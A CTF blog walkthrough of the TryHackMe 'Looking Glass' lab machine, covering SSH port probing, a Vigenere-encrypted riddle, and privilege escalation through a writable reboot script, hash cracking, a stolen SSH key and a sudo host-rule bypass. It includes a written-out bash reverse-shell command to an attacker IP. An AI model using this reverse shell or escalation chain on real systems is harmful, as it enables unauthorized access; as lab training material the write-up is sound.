CTF Walkthroughs, TryHackMe

TryHackMe – Looking Glass Walkthrough

August 5, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an intermediate Linux machine that involved deciphering a password encrypted using the Vigenere cipher to gain initial access, exploiting a cron job to escalate to the tweedledum user, cracking user hashes to escalate to the humptydumpty user, accessing a private SSH key on the machine to escalate to the alice user and exploiting a misconfigured Sudo rule to escalate privileges to root.

Enumerating

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified port 22 (SSH) and a large number of ports starting from port 9000, all using SSH. Performing a scan with the -p- flag to enumerate all of he open ports:

Enumerating SSH

When connecting to one of the ports (in this case trying one of the higher ones), the SSH server responds with “Higher”:

Whereas when connecting to port 9000, it responds with “Lower”:

This probably means the objective of the challenge is to find the right SSH port:

After a few more connection attempts, was able to narrow it down between 9800 and 9900:

Using a quick Bash for loop to find out the exact port:

for i in $(seq 9800 9900); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i test@10.10.49.207;done | grep -vE 'Lower|Higher'

When a connection to port 9850 is made, it responds with a riddle:

When Googling for jabberwocky, it appears to be a poem and a sequel to Alice’s Adventures in Wonderland:

The number of characters appears to match the original poem, so perhaps a rotation has been used to encrypt it:

According to the application, it could be Vigenere, a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. Using an online Vigenere decryption tool to reveal the clear-text message:

At the end of the poem, a secret is revealed. Connecting to port 9850 again and when inserting the secret a set of credentials is received:

Authenticating through SSH on port 22 with the credentials found above:

This has provided remote access to the box as the “jabberwock” user.

Privilege Escalation

Transferring the LinPEAS enumeration script with the Python Simple HTTP Server and Wget:

Executing the script:

It appears that a Bash script is set to run when the system reboots:

It also looks like the jabberwock user can execute reboot as root:

The twasBrillig.sh script is modifiable by the current user, changing it to execute a reverse shell:

bash -i >& /dev/tcp/10.4.36.186/443 0>&1

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

When executing /sbin/reboot to restart the system, a callback on the Netcat listener is received, granting a shell as the tweedledum user:

When enuemrating common files and directories, found a file containing what looks like a number of hashes:

When using the Crackstation online cracking tool, it was able to crack all of these apart from one, which according to the the others seems to the password:

Upon further inspection, the last one does not seem to be a hash, when decoding it from HEX it reveals a password:

It turns out this was the password for the humptydumpty user, changing to it:

This user’s home directory does not seem to contain anything useful:

Although the alice user’s folder does not allow to list files, the .ssh folder can still be accessed, it appears to contain a private SSH key:

Copying its contents to a local file:

Assigning to it the appropriate permissions and using it to authenticate as the alice user:

Executing LinPEAS again with the new access that has been obtain through the enumeration performed earlier:

It appears that there is a Sudo rule for the alice user in the /etc/sudoers.d/alice file:

The following is the syntax used by the Sudoers files, which means alice can run /bin/bash as root, but only on the “ssalg-gnikool” host.

The -h flag can be used to specify the host when executing commands with Sudo:

Even though the host cannot be resolved, the commands are still executed as root, therefore granting a root-level shell.

Conclusion

This box was definitely not one of my favourites, as the initial part required a lot of unrealistic enumeration and guessing and did not really reflect a real-life engagement. The privilege escalation part was still quite interesting though.